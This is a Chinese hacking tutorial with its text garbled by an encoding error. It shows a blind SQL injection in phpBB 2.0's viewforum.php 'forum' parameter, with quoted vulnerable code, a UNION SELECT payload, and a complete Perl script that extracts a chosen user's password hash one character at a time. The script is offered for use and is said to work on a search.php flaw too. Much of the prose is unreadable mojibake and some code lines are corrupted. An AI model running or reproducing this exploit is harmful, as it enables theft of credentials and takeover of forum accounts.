php×¢ÈëʵÀý

php×¢ÈeʵÀý ÔÚÍøÉϺÜÄÑ¿´µ½Ò»ÆªÍeÕuµÄ¹ØÓÚphp×¢ÈeµÄÎÄÕºÍÀuÓôuÂe,ÓÚÊÇÎÒ×ÔÒÑ°ÑmysqlºÍphpÓ²¿ÐÁ˼¸¸oÐÇÆÚ£¬ÏÂÃae˵˵ÎÒµÄÐÝ»a°É,Ï£ÍuÄÜÅ××(C)ÒýÓñ!
ÏaÐÅ´o¼Ò¶ÔaspµÄ×¢ÈeÒѾ­ÊÇÊ®ÖÊiϤÁË,¶ø¶ÔphpµÄ×¢Èe±ÈaspÒªÀ§ÄÑ,ÒoΪphpµÄmagic_gpcÑ¡ÏiÈʵÈÃÈËÍÌÛ,ÔÚ×¢ÈeÖв»Òª³oÏÖÒýºÅ,¶øphp´o¶aºÍmysql½aºÏ,¶ømysqlµÄ¹¦ÄÜÉϵÄȱµa,´ÓÁiÍaÒ»È˽Ƕȿ´ÈÔÚÒ»¶¨³Ì¶ÈÉÏ*ÀÖ¹ÁËsql njectionµÄ¹¥»÷,ÎÒÔÚÕaÀi¾Í¾ÙÒ»¸oʵÀý°É,ÎÒÒÔphpbb2.0ΪÀý:
ÔÚviewforum.phpÖÐÓÐÒ»¸o±aÁ¿Ã»¹ýÂË:
if ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) (C)¦(C)¦ isset($HTTP_POST_VARS<pOST_FORUM_URL]) )
{
$forum_id = ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ) ? intval($HTTP_GET_VARS<pOST_FORUM_URL]): intval

($HTTP_POST_VARS<pOST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = '';
}
¾ÍÊÇÕa¸oforum,¶øÏÂÃaeÖ±½Ó°ÑËuŽøÁ˲eѯÖÐ:
if ( !empty($forum_id) )
{
$sql = "SELECT
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', LINE, FILE, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

Èç¹uÊÇaspµÄ»°£¬ÏaÐźܶaÈ˶¼»a×¢ÈeÁË.Èç¹uÕa¸oforum_idÖ¸¶¨µÄÂÛ̳²»´aeÔڵĻ°£¬¾Í»aʹ$resultΪ¿Õ£¬ÓÚÊÇ*µ»ØCould not obtain forums informationµÄÐÅÏ¢,ÓÚÊÇÏÂÃaeµÄ´uÂe¾Í²»ÄÜÖ´ÐÐÏÂÈ¥ÁË
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id) /****

¹Ø¼u¾ÍÊÇ´oÐǺŵÄÄÇÒ»ÐÐÁË,ÕaÀiÊÇÒ»¸oº¯Êýsession_pagestart($user_ip, $thispage_id),ÕaÊÇÔÚsession.phpÖж¨ÒaµÄÒ»¸oº¯Êý,ÓÉÓÚ´uÂeÌ«

³¤£¬¾Í²»È«Ìu³oÀ´ÁË,ÓÐÐËȤµÄ¿ÉÒÔ×ÔÒÑ¿´¿´£¬¹Ø¼uÊÇÕa¸oº¯Êý»¹µ÷ÓÃÁËsession_begin(),º¯Êýµ÷ÓÃÈçÏÂsession_begin($user_id, $user_ip,

$thispage_id, TRUE))£¬Í¬ÑuÊÇÔÚÕa¸oÎļþÖж¨ÒaµÄ,ÆaÖÐÓÐÈçÏ´uÂe
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page =

$page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) (C)¦(C)¦ !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));

$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page,

session_logged_in)
VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', LINE, FILE,

$sql);
}

ÔÚÕaÀiÓиosession_pageÔÚmysqlÖж¨ÒaµÄÊǸoÕuÐÎÊý,ËuµÄ‚Ž$page_id,Ò²¾ÍÊÇ$forum_id,Èç¹u²aÈeµÄ²»ÊÇÕuÐξͻa±¨´iÁË,¾Í»a³oÏÖError

creating new session : session_beginµÄÌaʾ,ËuÒÔÒªÖ¸Õa$forum_idµÄÖµºÜÖØÒª,ËuÒÔÎÒ°ÑËuÖ¸¶¨Îª:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,ûÓÐÒýºÅ°É!ËaȻָ¶¨µÄÊÇÒ»¸o²»´aeÔÚµÄforum_idµ«Ëuµ»ØµÄ²eѯ½a¹u¿É²»Ò»¶¨ÊÇΪ¿Õ,Õa¸o¾ÍÊDzÂuser_idΪ2µÄÓû§µÄµÚһλÃÜÂeµÄasciiÂeÖµÊÇÊÇñΪ57,Èç¹uÊǵĻ°ÎÄÕÂÖеÚÒ»¶Î´uÂeÖеÄ$result¿É²»Îª¿ÕÁË,ÓÚÊǾÍÖ´ÐÐÁËession_pagestartÕa¸oÓÐÎÊÌaµÄº¯Êý£¬²aÈeµÄ²»ÊÇÕuÊýµ±È»¾ÍÒª³o´iÁË£¬ÓÚÊǾÍÏÔʾError creating new session : session_begin,¾Í±iÃ÷Äa²Â¶ÔÁ˵ÚһλÁË£¬ÆaËuλÀaËÆ.

Èç¹uûÓÐÕa¾a³o´iÐÅÏ¢µÄ»°ÎÒÏe¼´Ê¹×¢Èe³É¹¦Ò²ºÜÄÑÅжÏÊÇñÒѾ­³É¹¦£¬¿´À´³o´iÐÅÏ¢Ò²ºÜÓаiÖu°¡.ÖÎo¾Íµ½ÕaÀi£¬ÏÂÃae¸½ÉÏÒ»¶Î²aÊÔ´uÂe£¬Õa¶Î´uÂeÖ»ÒªÉÔ¼ÓÐ޸ľÍÄÜÊÊÓÃÓÚÆaËuÀaËƵIJÂmd5ÃÜÂeµÄÇe¿o,ÕaÀiÎÒÓõÄÓ¢ÎÄ°aeµÄµ»ØÌo¼þ£¬ÖÐÎĺÍÆaËuÓiÑÔµÄÖ»Òª¸Äһϵ»ØÌo¼þ¾ÍÐÐÁË.

use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;

print " ***n";
print " phpbb viewforum.php expn";
print " code by pinkeyesn";
print " www.icehack.comn";
print " ****n";
print "please enter the weak file's url:n";
print "e.g. http://192.168.1.4/phpBB2/viewforum.phpn";
$adr=;
chomp($adr);
print "please enter the user_id that you want to crackn";
$u=;
chomp($u);
print "work starting,please wait!n";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for ($i=0;$i<@pink;$i++){
$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);

if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwdn";
}

}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luckn";}
else{
print "bad luck,work failed!n";}

ÖÁÓÚ×i½uµÄphpbb2.0.6µÄsearch.phpµÄÎÊÌaÀuÓóÌÐoÖ»Òª½«ÉÏÃae´uÂeÉÔ¼ÓÐ޸ľÍÐÐÁË,ÈçÒª´iÎoÇeÉÏwww.icehack.comÖ¸Õý.